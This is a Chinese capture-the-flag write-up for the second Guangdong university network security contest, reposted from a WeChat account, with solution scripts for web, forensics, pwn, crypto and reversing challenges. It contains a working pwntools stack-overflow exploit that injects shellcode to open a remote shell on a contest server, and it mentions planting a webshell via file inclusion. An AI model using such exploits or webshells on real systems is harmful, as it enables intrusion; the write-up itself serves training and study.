签到题
直接上公众号发送我来签到了
easy_ctf
- import requests
- import re
-
- while True:
- session = requests.Session()
- ans = ""
- url = 'http://120.79.191.238:42958/'
- content = session.get(url).text
- res = re.findall('<td style="WORD-WRAP: break-word" width="1600">(.*)<td>', content, re.S)
- text = res[0].replace('r', '').replace('n', '')
- lst = {}
- for i in text:
- if i not in lst:
- lst[i] = 1
- else:
- lst[i] += 1
-
- lst = sorted(lst.items(), key=lambda x: x[1])
- for i in lst:
- ans += i[0]
-
- result = session.post(url, data={
- 'ans': ans
- }).text
-
- if "flag" in result:
- print(result)
- print(ans)
- break
根据题目的意思编写代码,循环提交,当返回结果出现flag后停止程序
in
文件包含
挂马
蚁剑连接
复合
使用wireshark打开文件,查看数据后,尝试导出http数据
查看text.html有flag,尝试之后并不是正确flag
查看各个文件,发现pass.md是个缺少文件头的压缩包,补全文件头,修改扩展名
压缩包中文件的内容,根据特征发现是quoted-printable编码
http://web.chacuo.net/charsetquotedprintable
像一段文本但是不是正确的单词,猜测凯撒密码一类,尝试维吉尼亚密码破解
根据文章意思提取flag{life_is_fantastic }
jmp_rsp
- from pwn import *
- context(log_level = 'debug', arch = 'amd64', os = 'linux')
-
- shellcode = asm(shellcraft.sh())
-
- p=remote("47.106.122.102",41377)
-
- jmp_rsp=0x46d01d# use this to jmp rsp
- payload='0'*136+p64(jmp_rsp)+shellcode
- p.sendline(payload)
- pause()
- p.interactive()
crypto-xor2
- def decode():
- with open("./cipher", "r") as f:
- ss = f.read()
- key = "xxxx"
- flag=""
- for i, c in enumerate(ss):
- flag += chr(ord(c) ^ ord(key[i%4]))
- print(flag)
-
- decode()
pyre
- def get_list():
- shuzus = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152, 78, 171, 12, 53, 105, 45, 12, 12, 53,
- 12, 171, 111, 91, 53, 152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
- shuzi = 179
- str = ""
- for shuzu in range(len(shuzus)):
- for i in range(0, 128):
- print(i)
- if i * 33 % shuzi != shuzus[shuzu]:
- continue
- else:
- str += chr(i)
- print(str)
- break
-
-
- def test_flag():
- flag = input('请输入flag:')
- shuzus = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152, 78, 171, 12, 53, 105, 45, 12, 12, 53,
- 12, 171, 111, 91, 53, 152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
- if len(flag) != 42:
- print('长度有错')
- return 0
- shuzi = 179
- for i in range(len(flag)):
- if ord(flag[i]) * 33 % shuzi != shuzus[i]:
- print('未拿到')
- return
- print('拿到了flag')
-
-
- test_flag()
- get_list()
接下来抽奖送可达鸭,可以在双手贴上白纸,写上自己喜欢的文字
原文始发于微信公众号(bgbing安全):第二届广东大学生网络安全攻防大赛部分WP(抽奖送可达鸭)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论